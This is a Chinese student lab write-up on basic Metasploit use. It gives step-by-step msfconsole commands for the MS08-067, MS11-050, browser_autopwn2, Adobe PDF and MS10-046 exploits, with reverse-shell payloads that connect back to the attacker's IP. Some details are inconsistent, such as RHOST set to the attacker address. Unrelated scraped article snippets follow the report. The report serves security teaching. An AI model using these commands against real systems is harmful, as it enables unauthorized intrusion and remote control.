Exp5:MSF基础应用

一、基础问题回答

(1)用自己的话解释什么是 exploit , payload , encode.

exploit: 设相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。

payload: 简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务。

encode: 针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payload进行加工。

二、实践过程

  • 1.Windows服务渗透攻击——MS08-067安全漏洞

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

      msf > use exploit/windows/smb/ms08_067_netapi

      msf exploit(ms08_067_netapi) > show payloads

      msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连

      msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻击机ip

      msf exploit(ms08_067_netapi) > set LPORT 5213 //攻击端口

      msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶机ip,特定漏洞端口已经固定

      msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高

      msf exploit(ms08_067_netapi) > exploit //攻击

    • 此时需要关闭靶机的防火墙,不然会出现ConnectionTimeOut的失败;

    • 攻击成功后的结果:

  • 2.浏览器渗透攻击——MS11-050

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    msf > use windows/browser/ms11_050_mshtml_cobjectelement

    msf exploit(ms11_050_cobjectelement) > set payload
    windows/meterpreter/reverse_http //http反向回连

    msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻击端口固定

    msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //统一资源标识符路径设置

    msf exploit(ms11_050_cobjectelement) > exploit

  • 测试无法成功,总是会出现IE浏览器的错误,我觉得问题是出在浏览器版本不对,不适合那个漏洞,既然如此,那就换个漏洞呗,下面使用一种自动根据浏览器版本选择合适的漏洞进行攻击的方法
    • ** 实施browser_autopwn模块 **

      • 现在攻击机里进入msfconsole,然后分别输入

        use auxiliary/server/browser_autopwn2

        set SRVHOST 192.168.43.161

        set URIPATH auto

        show options

      • 开始攻击,此时可以看到msf在不停的尝试不同的payload
      • 尝试成功,输出了可被访问的URL http://192.168.43.161:8080/auto并启动服务器;

      • 在靶机浏览器上输入URL后,浏览器跳转到 http://192.168.43.161:8080/auto/FaOGsp

      • 回头看一下kali机,发现回连成功了,输入session -i 2获取对话,此时,已经获得了靶机的控制权。

  • 3.针对Adobe Reader软件的渗透攻击——adobe_toolbutton

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    msf > use windows/fileformat/adobe_cooltype_sing

    msf exploit(adobe_cooltype_sing) > set payload
    windows/meterpreter/reverse_tcp //tcp反向回连

    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻击端口

    msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //设置生成pdf文件的名字

    msf exploit(adobe_cooltype_sing) > exploit //攻击

    • 将生成的pdf文件拷贝到靶机上。

    • 在kali上输入back退出当前模块,进入监听模块,输入以下命令:

    msf > use exploit/multi/handler //进入监听模块

    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接

    msf exploit(handler) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(handler) > set LPORT 5213 //攻击端口固定

    msf exploit(handler) > exploit

    • 在靶机上打开5213lzm.pdf文件:
    • 攻击机显示攻击成功:
  • 4.快捷方式图标漏洞——MS10-046
    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

      msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

      msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.43.48 //攻击机ip

      msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp //tcp反向回连

      msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.43.48 //攻击机ip

      msf exploit(ms10_046_shortcut_icon_dllloader) > exploit //攻击

      • 此时弹出一个攻击者IP的目录,其中有一个“快捷方式”的图标:
      • 对于已建立好了会话,通过命令sessions查看,并选择sessions -i 1,获得靶机控制权。

        (PS)本次试验时间上跨度有点大,没能连贯的做完,第四个项任务是在ciscn结束之后做的,而此时的kali机已被折腾崩了,所以考了别人的虚拟机,继续做完了,这里的IP不是之前那个。

三、实践总结及体会

本次试验给我最深的感触就是msf的强大,活用msf真的能够在渗透测试或者以攻击为目的的行为给予很大帮助,同时,为了防止被攻击,还是及时更新系统,填补漏洞,因为有一双研眼镜正在窥探你的笔记本。

Exp5:MSF基础应用的更多相关文章

  1. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  4. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  5. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  6. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  7. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  9. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  10. 2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165336<网络攻防技术>Exp5 MSF基础应用 一.攻击实例 主动攻击的实践 ms08_067(成功) payload/generic/shell_rev ...

随机推荐

  1. [Android] 设置AlertDialog打开后不消失

    最近项目收尾,一堆bug要改,还要对用户操作体验做一些优化,也是忙的不行.周末难得清闲,出去逛逛,看看风景,还好因为习大大要来,南京最近的天气还不错,只是苦了当地的不少农民工,无活可干,无钱可拿.想想 ...

  2. Java高并发编程(四)

    一.Executor执行器 1.Executor接口,java线程池框架中的顶层接口,提供一个execute方法来执行任务 import java.util.concurrent.Executor; ...

  3. 插入图片新方式:data:image

    我们在使用<img>标签和给元素添加背景图片时,不一定要使用外部的图片地址,也可以直接把图片数据定义在页面上.对于一些“小”的数据,可以在网页中直接嵌入,而不是从外部文件载入. 如何使用 ...

  4. 使用动态跟踪技术SystemTap监控MySQL、Oracle性能

    [IT168 技术]本文根据吕海波2018年5月11日在[第九届中国数据库技术大会]上的演讲内容整理而成. 讲师介绍: 吕海波,美创科技研究员,ITPUB管理版版主.出版技术书籍<Oracle内 ...

  5. python容错

    #try: except: else: #为什么叫容错呢,先说说错误,这里说的错误并不是因为马虎或者什么原因在脚本中留下的bug,这个不能容掉,所谓容掉就是略过这个错误,要在测试时候发现并修正,需要容 ...

  6. 接口调用,输出结果为Json格式(ConvertTo-Json),提交参数给URL(WebRequest)

    1.直接输出为json格式: Get-Process -Id $pid | ConvertTo-Json | clip.exe 2.自定义结果为json格式: $serverinfoj = @&quo ...

  7. wc 统计文件的行数,字数,字符

    格式:wc 参数 文件  默认统计文件的行数,字数,字符. -l   统计有多少行数 -c   统计有多少个字节 -m  统计有多少个字符 -w 统计有多少个字数

  8. Linux centos6.5 系统语言改成中文简体

    有时候上传的文件在linux上ls显示的时乱码,原因可能是系统语言编码问题,以Linux centos6.5为例,解决方法如下: 1.在root(皇帝)权限下更改: 查看当前所有语言环境:locale ...

  9. 【转】MaBatis学习---源码分析MyBatis缓存原理

    [原文]https://www.toutiao.com/i6594029178964673027/ 源码分析MyBatis缓存原理 1.简介 在 Web 应用中,缓存是必不可少的组件.通常我们都会用 ...

  10. Linux运维之——每日小技巧,获取网站请求数的前20个IP

    获取网站请求书的前20个IP |grep tcp|awk '{print $5}'|awk -F: '{print $1}'|sort|uniq -c|sort -nr|head -n20